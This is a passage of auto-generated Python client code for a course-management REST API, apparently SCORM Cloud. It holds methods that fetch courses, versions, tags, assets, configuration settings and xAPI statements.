collection_formats=collection_formats)
def get_course_statements(self, course_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course # noqa: E501
Returns xAPI statements for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_statements(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_statements_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_statements_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_statements_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course # noqa: E501
Returns xAPI statements for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_statements_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'learner_id', 'since', 'until', 'more'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_statements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_statements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'learner_id' in params:
query_params.append(('learnerId', params['learner_id'])) # noqa: E501
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/xAPIStatements', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='XapiStatementResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_tags(self, course_id, **kwargs): # noqa: E501
"""Get tags for a Course # noqa: E501
Returns the tags for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_tags(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: TagListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_tags_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_tags_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_tags_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get tags for a Course # noqa: E501
Returns the tags for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_tags_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: TagListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_asset(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a specific Course Version # noqa: E501
Downloads the asset file at the provided relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_asset(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
return data
def get_course_version_asset_with_http_info(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a specific Course Version # noqa: E501
Downloads the asset file at the provided relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_asset_with_http_info(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_asset`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `get_course_version_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_configuration(self, course_id, version_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course Version # noqa: E501
Returns the effective configuration settings for the course version. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_configuration(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_configuration_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_configuration_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_configuration_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course Version # noqa: E501
Returns the effective configuration settings for the course version. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_configuration_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'include_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_configuration`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'include_metadata' in params:
query_params.append(('includeMetadata', params['include_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SettingListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_file_list(self, course_id, version_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course Version # noqa: E501
Returns a list of asset files in the course version. Included will be the relative path to use for the other course asset manipulation calls. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_file_list(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_file_list_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_file_list_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_file_list_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course Version # noqa: E501
Returns a list of asset files in the course version. Included will be the relative path to use for the other course asset manipulation calls. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_file_list_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_file_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_file_list`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_file_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get detailed information about a Course Version # noqa: E501
Returns detailed information about the course version. This includes update date and registration count (if optional value is passed in). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_info_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_info_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_info_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get detailed information about a Course Version # noqa: E501
Returns detailed information about the course version. This includes update date and registration count (if optional value is passed in). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_info_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_info" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_info`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_info`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_statements(self, course_id, version_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course Version # noqa: E501
Returns xAPI statements for the course version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_statements(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_statements_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_statements_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_statements_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course Version # noqa: E501
Returns xAPI statements for the course version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_statements_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'learner_id', 'since', 'until', 'more'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_statements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_statements`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_statements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'learner_id' in params:
query_params.append(('learnerId', params['learner_id'])) # noqa: E501
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/xAPIStatements', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='XapiStatementResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_versions(self, course_id, **kwargs): # noqa: E501
"""Get a list of a Course's Versions # noqa: E501
Returns information about all versions of the course. This can be useful to see information such as registration counts and modification times across the versions of a course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_versions(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseListNonPagedSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_versions_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_versions_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_versions_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get a list of a Course's Versions # noqa: E501
Returns information about all versions of the course. This can be useful to see information such as registration counts and modification times across the versions of a course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_versions_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseListNonPagedSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'since', 'until', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_versions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_versions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseListNonPagedSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_courses(self, **kwargs): # noqa: E501
"""Get a list of Courses # noqa: E501
Returns a list of courses. Can be filtered using the request parameters to provide a subset of results. >**Note:** >This request is paginated and will only provide a limited amount of resources at a time. If there are more results to be collected, a `more` token provided with the response which can be passed to get the next page of results. When passing this token, no other filter parameters can be sent as part of the request. The resources will continue to respect the filters passed in by the original request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_courses(async_req=True)
>>> result = thread.get()
:param async_req bool
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str datetime_filter: Specifies field that `since` and `until` parameters are applied against
:param list[str] tags: Filter items matching any tag provided (not all)
:param str filter: Optional string which filters results by a specified field (described by filterBy).
:param str filter_by: Optional enum parameter for specifying the field on which to run the filter.
:param str order_by: Optional enum parameter for specifying the field and order by which to sort the results.
:param str more: Pagination token returned as `more` property of multi page list requests
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:param bool include_registration_count: Include the registration count in the results
:return: CourseListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_courses_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_courses_with_http_info(**kwargs) # noqa: E501
return data
def get_courses_with_http_info(self, **kwargs): # noqa: E501
"""Get a list of Courses # noqa: E501
Returns a list of courses. Can be filtered using the request parameters to provide a subset of results. >**Note:** >This request is paginated and will only provide a limited amount of resources at a time. If there are more results to be collected, a `more` token provided with the response which can be passed to get the next page of results. When passing this token, no other filter parameters can be sent as part of the request. The resources will continue to respect the filters passed in by the original request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_courses_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str datetime_filter: Specifies field that `since` and `until` parameters are applied against
:param list[str] tags: Filter items matching any tag provided (not all)
:param str filter: Optional string which filters results by a specified field (described by filterBy).
:param str filter_by: Optional enum parameter for specifying the field on which to run the filter.
:param str order_by: Optional enum parameter for specifying the field and order by which to sort the results.
:param str more: Pagination token returned as `more` property of multi page list requests
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:param bool include_registration_count: Include the registration count in the results
:return: CourseListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['since', 'until', 'datetime_filter', 'tags', 'filter', 'filter_by', 'order_by', 'more', 'include_course_metadata', 'include_registration_count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_courses" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'datetime_filter' in params:
query_params.append(('datetimeFilter', params['datetime_filter'])) # noqa: E501
if 'tags' in params:
query_params.append(('tags', params['tags'])) # noqa: E501
collection_formats['tags'] = 'csv' # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'filter_by' in params:
query_params.append(('filterBy', params['filter_by'])) # noqa: E501
if 'order_by' in params:
query_params.append(('orderBy', params['order_by'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
